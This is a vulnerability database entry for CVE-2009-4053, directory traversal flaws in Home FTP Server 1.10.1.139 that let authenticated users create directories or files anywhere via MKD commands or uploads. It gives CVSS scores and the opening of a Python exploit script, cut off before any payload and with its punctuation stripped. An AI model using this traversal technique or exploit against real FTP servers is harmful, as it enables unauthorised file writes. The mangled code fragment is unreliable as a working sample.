4
CVSSv2

CVE-2009-4053

Published: 23/11/2009 Updated: 26/01/2024
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
CVSS v3 Base Score: 6.5 | Impact Score: 3.6 | Exploitability Score: 2.8
VMScore: 405
Vector: AV:N/AC:L/Au:S/C:N/I:P/A:N

Vulnerability Summary

Multiple directory traversal vulnerabilities in Home FTP Server 1.10.1.139 allow remote authenticated users to (1) create arbitrary directories via directory traversal sequences in an MKD command or (2) create files with any contents in arbitrary directories via directory traversal sequences in a file upload request. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

home ftp server project home ftp server 1.10.1.139

Exploits

#!/usr/bin/python import socket import sys def Usage(): print ("Usage: /explpy <serv_ip> <Username> <password>\n") print ("Example:/explpy 19216848183 anonymous anonymous\n") if len(sysargv) <> 4: Usage() sysexit(1) else: hostname=sysargv[1] username=sysargv[2] passwd=sys ...